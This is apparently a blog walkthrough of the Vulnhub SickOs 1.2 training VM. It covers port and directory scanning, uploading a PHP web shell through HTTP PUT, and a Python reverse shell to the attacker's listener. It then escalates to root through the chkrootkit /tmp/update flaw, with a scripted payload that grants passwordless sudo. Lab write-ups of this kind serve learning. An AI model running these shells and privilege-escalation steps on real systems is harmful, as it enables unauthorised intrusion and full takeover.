Sunday, 9 October 2016

Vulnhub SickOs 1.2

I appear to have a Vulnhub addiction ATM! I put this down to having a free weekend so I can hone my skills :)

This VM was tricky towards the end, as the usual scripts etc. didn't work. I certainly had to think outside the box for this one! It is a great VM and you should definitely give it a go.

So big thanks to Vulnhub and D4rk36 for this :)


root@kali:~# nmap -Pn -sV -p 0-65535

Starting Nmap 7.25BETA2 ( ) at 2016-10-08 16:11 BST
Nmap scan report for
Host is up (0.00030s latency).
Not shown: 65534 filtered ports
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
MAC Address: 00:0C:29:EB:E6:56 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 124.06 seconds


I'll see what ssh yields:

root@kali:~/Downloads# ssh
 .oooooo..o  o8o            oooo          .oooooo.                 .o        .oooo.
d8P'    `Y8  `"'            `888         d8P'  `Y8b              o888      .dP""Y88b
Y88bo.      oooo   .ooooo.   888  oooo  888      888  .oooo.o     888            ]8P'
 `"Y8888o.  `888  d88' `"Y8  888 .8P'   888      888 d88(  "8     888          .d8P'
     `"Y88b  888  888        888888.    888      888 `"Y88b.      888        .dP'  
oo     .d8P  888  888   .o8  888 `88b.  `88b    d88' o.  )88b     888  .o. .oP     .o
8""88888P'  o888o `Y8bod8P' o888o o888o  `Y8bood8P'  8""888P'    o888o Y8P 8888888888
By @D4rk36
root@'s password:

Not a lot, apart from some nice ASCII art :D

I'll try port 80 then!


Navigating to the IP gives the following page.

The source code contains no hints, so I'll see if there is anything hidden:

root@kali:~/Downloads# dirb -w

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Oct 8 16:22:08 2016
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stoping on warning messages

-----------------


---- Scanning URL: ----
+ (CODE:200|SIZE:163)

---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)


Let's see what /test yields:


I check for known weaknesses in lighttpd/1.4.28 but come away empty-handed.

There must be a way to upload to this page... Hang on! Which HTTP methods does /test actually accept? An OPTIONS request will tell me. Can I PUT?

Phew! I can PUT here. Now to work out how to get a file up there. Ideally I want a reverse shell, so pentestmonkey's php-reverse-shell should do.

I upload it using nmap's scripting engine (the http-put script):

Check to see if it's there:

Awesome! I start a netcat listener on port 443, then browse to the file.


That failed miserably :(

OK, I wonder if I can get a dirty web shell on it instead? I upload the one-liner:

<?php echo shell_exec($_GET['cmd']); ?>

Run the command via the browser:

Sweet! Now I can try to throw a Python reverse shell back to my listener. I use 443 as it's a web port, so it is less likely to be blocked by any egress filtering:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And the result is:


Now to start enumerating:

OK, happy with the release details; now to see if I can write anywhere:
I can write to /tmp, but when I upload my enumeration script it won't let me execute it :( (If /tmp is mounted noexec, running the script through its interpreter, e.g. bash ./script.sh, gets around that.)

I start to enumerate manually and eventually find some things in the crontab:

I'll check out the daily one:

OK, there's some stuff in here; time to start looking at the code.
After sifting through the code nothing jumps out at me, so I turn to Google to see if chkrootkit has any known flaws.

Exploit-DB comes up trumps with this: chkrootkit before 0.50 will run /tmp/update as root if that file exists, because an unquoted variable in its slapper() check turns the path into a command (CVE-2014-0476).

Awesome! Now to create that /tmp/update file and leverage myself some privileges!

Inside the file I put:

chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers

This should give my www-data account sudo rights without a password :) The file also has to be executable (chmod +x /tmp/update), because chkrootkit runs it as a command rather than reading it. The chmod 777 isn't strictly needed, as the cron job already runs as root, but the permissions are put back to 440 straight afterwards so sudo won't refuse the file.
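The /tmp/update step written out as an added example (not the post's own commands, which are in the screenshots): it writes the payload with the sudoers line from the post, marks it executable, checks that everything is in place, and polls sudo so you notice when the cron job has fired. The path /tmp/update is the one chkrootkit's slapper() check looks for; the function names and the polling interval are this example's choices.

```shell
#!/bin/sh
# Added example: stage the chkrootkit (< 0.50) /tmp/update payload from the
# post and verify it, then wait for the daily cron run to grant sudo.

# Write the payload script.  It is executed by root, so it can edit sudoers
# directly; the three commands are the ones from the post.
write_update_payload() {  # write_update_payload /tmp/update
    target="$1"
    cat > "$target" <<'EOF'
#!/bin/sh
# Executed as root by chkrootkit's slapper() check: give www-data NOPASSWD sudo.
chmod 777 /etc/sudoers
echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers
chmod 440 /etc/sudoers
EOF
    # chkrootkit expands an unquoted variable into "/tmp/update" and runs it as
    # a command, so the file must be executable or nothing happens.
    chmod +x "$target"
}

# Succeed only if the payload is executable, is a shell script, and carries
# the sudoers line we expect; anything else and the cron run will do nothing.
check_update_payload() {  # check_update_payload /tmp/update
    target="$1"
    [ -x "$target" ] &&
    head -n 1 "$target" | grep -q '^#!/bin/sh' &&
    grep -q 'www-data ALL=NOPASSWD: ALL' "$target"
}

# Poll until sudo no longer asks for a password, i.e. the cron job has run.
wait_for_sudo() {         # wait_for_sudo 60   (seconds between checks)
    until sudo -n true 2>/dev/null; do
        sleep "${1:-60}"
    done
    echo "cron has fired: sudo -n works, now: sudo su -"
}

# On the target, as www-data:
#   write_update_payload /tmp/update && check_update_payload /tmp/update && wait_for_sudo 60
```

One caveat worth keeping in mind: appending to /etc/sudoers bypasses visudo's syntax check, and a malformed line breaks sudo for everyone, so the line must be exactly right before the job fires. On a real engagement a payload that drops a root-owned SUID copy of /bin/sh, or that writes a separate file under /etc/sudoers.d, is easier to clean up than an edited sudoers.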

The cronjob runs and:

I am root :) 

Let's see what is lurking within:

Phew! This one made me stretch the old grey matter!
